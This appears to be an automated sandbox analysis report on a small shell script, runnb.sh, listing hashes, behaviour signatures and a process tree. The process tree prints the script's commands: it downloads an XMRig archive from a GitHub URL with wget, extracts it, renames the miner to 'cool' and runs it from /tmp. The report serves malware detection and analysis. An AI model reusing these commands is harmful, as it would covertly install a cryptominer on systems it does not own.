Overview

overview

10

Static

static

1

runnb.sh

ubuntu-18.04-amd64

7

runnb.sh

ubuntu-20.04-amd64

10

runnb.sh

ubuntu-22.04-amd64

10

runnb.sh

ubuntu-24.04-amd64

10

Analysis

  • max time kernel
    2s
  • max time network
    62s
  • platform
    ubuntu-18.04_amd64
  • resource
    ubuntu1804-amd64-20240611-en
  • resource tags

    arch:amd64arch:i386image:ubuntu1804-amd64-20240611-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system
  • submitted
    30-10-2024 07:09

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    runnb.sh

  • Size

    213B

  • MD5

    a1189543e2f98f6696c6d857b899ab0a

  • SHA1

    30b167128357a05cb5ae4d8bd386d63839d99c4d

  • SHA256

    a5951456684af2a46da1bcd8c820221c97b13a439db465c2b671fa3180d838d6

  • SHA512

    472e7cd110beb4c0ff9990763988190c875dccecc726753e295d4419413bfd14ed867a9a5977adf2d6e87d6e80f18abbdd0a929473f02bbfb24e1531e71d7aef

Score
7/10
defense_evasiondiscoveryprivilege_escalation

Malware Config

Signatures

  • File and Directory Permissions Modification 1 TTPs 1 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

    defense_evasion
  • Abuse Elevation Control Mechanism: Sudo and Sudo Caching 1 TTPs 1 IoCs

    Abuse sudo or cached sudo credentials to execute code.

    privilege_escalationdefense_evasion
  • Enumerates kernel/hardware configuration 1 TTPs 4 IoCs

    Reads contents of /sys virtual filesystem to enumerate system information.

    discovery
  • Reads runtime system information 16 IoCs

    Reads data from /proc virtual filesystem.

    discovery
  • Writes file to tmp directory 16 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/runnb.sh
    /tmp/runnb.sh
    1⤵
      PID:1465
      • /usr/bin/sudo
        sudo apt install wget
        2⤵
        • Abuse Elevation Control Mechanism: Sudo and Sudo Caching
        • Reads runtime system information
        PID:1470
      • /usr/bin/apt
        apt install wget
        2⤵
        • Reads runtime system information
        • Writes file to tmp directory
        PID:1476
        • /usr/bin/dpkg
          /usr/bin/dpkg --print-foreign-architectures
          3⤵
          • Reads runtime system information
          PID:1477
        • /usr/bin/dpkg
          /usr/bin/dpkg --print-foreign-architectures
          3⤵
          • Reads runtime system information
          PID:1481
        • /bin/sh
          /bin/sh -c "[ ! -f /usr/bin/snap ] || /usr/bin/snap advise-snap --from-apt 2>/dev/null || true"
          3⤵
            PID:1487
            • /usr/bin/snap
              /usr/bin/snap advise-snap --from-apt
              4⤵
              • Enumerates kernel/hardware configuration
              • Reads runtime system information
              PID:1488
          • /bin/sh
            /bin/sh -c "[ ! -f /usr/bin/snap ] || /usr/bin/snap advise-snap --from-apt 2>/dev/null || true"
            3⤵
              PID:1495
              • /usr/bin/snap
                /usr/bin/snap advise-snap --from-apt
                4⤵
                • Enumerates kernel/hardware configuration
                • Reads runtime system information
                PID:1496
            • /bin/sh
              /bin/sh -c "[ ! -f /usr/bin/snap ] || /usr/bin/snap advise-snap --from-apt 2>/dev/null || true"
              3⤵
                PID:1501
                • /usr/bin/snap
                  /usr/bin/snap advise-snap --from-apt
                  4⤵
                  • Enumerates kernel/hardware configuration
                  • Reads runtime system information
                  PID:1502
              • /bin/sh
                /bin/sh -c "[ ! -f /usr/bin/snap ] || /usr/bin/snap advise-snap --from-apt 2>/dev/null || true"
                3⤵
                  PID:1507
                  • /usr/bin/snap
                    /usr/bin/snap advise-snap --from-apt
                    4⤵
                    • Enumerates kernel/hardware configuration
                    • Reads runtime system information
                    PID:1508
              • /usr/bin/wget
                wget https://github.com/orkaroeli/orkaroeliminer/raw/refs/heads/main/xmrigtar.tar.gz
                2⤵
                  PID:1513
                • /bin/tar
                  tar xvf xmrigtar.tar.gz
                  2⤵
                  • Reads runtime system information
                  PID:1516
                • /bin/chmod
                  chmod +x xmrig
                  2⤵
                  • File and Directory Permissions Modification
                  PID:1518
                • /bin/mv
                  mv xmrig cool
                  2⤵
                  • Reads runtime system information
                  PID:1519
                • /tmp/cool
                  ./cool
                  2⤵
                    PID:1520

                Network

                MITRE ATT&CK Enterprise v15

                Replay Monitor

                Loading Replay Monitor...

                Downloads

                • /tmp/fileutl.message.2Z6sVa
                  Filesize

                  235KB

                  MD5

                  373fe2f2ef99005d2550a482f09a3e51

                  SHA1

                  68e6572b55b1e77f7d171ebac7b2579b7a6bd51d

                  SHA256

                  7552d5ab0c3879756a860aaab8e7c2f8ffb9409ea9ff9e65fc046ba5c519ebe5

                  SHA512

                  def9e854b824d2fddc6a15f898be73cfb679ac38563f5af854546f49c9d5d2316a40176dc41d6b360bda7b65de53863a53e4eedadf6336000b031b77a113607b

                  Download Submit